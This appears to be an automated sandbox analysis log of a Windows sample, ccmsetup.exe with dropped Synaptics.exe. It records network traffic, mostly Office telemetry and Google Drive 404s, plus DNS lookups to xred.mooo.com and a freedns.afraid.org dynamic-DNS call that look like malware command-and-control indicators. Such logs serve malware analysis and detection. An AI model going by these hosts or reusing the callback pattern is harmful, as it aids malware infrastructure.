                              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 21:50:16 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-aLUGkF0k6MmCTjeOuZBoTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC75Oc9nohzsmgWCW86BmmFlPezwFx3l5ROzFFZKSMwbzIPs5yjtYANnUrdXrdZqHPbpc8488J9NbwServer: UploadServerSet-Cookie: NID=519=XAK-F-xT7EjeEQabmLXL3lyU7QzNh7EJ4EZ7QA0BOToG-xr5be7_Rh7oIUvEkfgRfufMwAslLXQCTczVKHZ5PNTjQd0D2eR5hjAiAkGYaCfmIbfcr8C6ZcLlgOUE6RPDg9koF4oy0R-5waNi_sTkf4O5c-frZCUvXEFXbRYaOcZwVnQYSGonaj3Y; expires=Fri, 06-Jun-2025 21:50:16 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 21:50:16 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-0pyv0B0qf1NCaECKx8ecZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC4R75m7PVLwYG-drg1AeK_8FEc8_N4V2JlFNxbS-t5kcr2QPBkCOaHP8k5zEGGMvMHuBmrgmm4hYgServer: UploadServerSet-Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k; expires=Fri, 06-Jun-2025 21:50:16 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 21:50:23 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-fCOtNfxMBp12cRLlDfEk1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC6Kf_LB2s2Ylt2SAi7tcnX7nQv_TUI35TL_j1Xo_ZighmQZ9wiSC8iw42zJl38_reYlbE5CNtUIGgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 21:50:23 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xpgmVQObIPSZ4RoQpbE11g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC6OhGIlKkIe1QmVLK3cgHqgev68wC3dNRbW04LCORfKr5OEEq7ilqeXq6gVPivn3X9ua88Y3LduxgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 21:50:32 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-qH4YQ2Pvljzm-jI3woo2MQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC4MOWu-6nP2OGgwDAAZwYwzhaZ1Hc7DoGBK3pT36XBruN0NmvathgaJ95c2oWHedJb9dr0Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 21:50:32 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-TMUZdAanDokDjil0oUsAmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC6yM_zTEqldBD0XIA95jjEoq4Cz36jt7biocueOStF7oh6pSVQHJgM-ePwDkXN2Ac-uHbnA9hzEoAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 21:50:50 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-eS6xHG_99f5UpXjpFHLNdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC6qjrilpL4icqobZaAxP-5gdPRpTwsNCMsET-bba3wyBsJOQfsrOncRX0r2S4J1Sh3T3ev9hu59AwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 21:50:50 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-A8PAKgl1jFgw8q0UxuVSCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC4KmJk45XUGCAkk-EvYORAtEnL8KQFsZAV7e2Tn6hBbPNkEbrRzWeXiufKmcZuKNcOnIxDr8U1S9QServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: ._cache_ccmsetup.exeString found in binary or memory: http://%s/%s/.sms_aut?SITESIGNCERT
                              Source: ._cache_ccmsetup.exeString found in binary or memory: http://%s/SMS_MP/.sms_aut?SMSTRC
                              Source: ccmsetup.exe, ._cache_ccmsetup.exe.0.dr, Synaptics.exe.0.drString found in binary or memory: http://%s/SMS_MP/.sms_aut?SMSTRC..
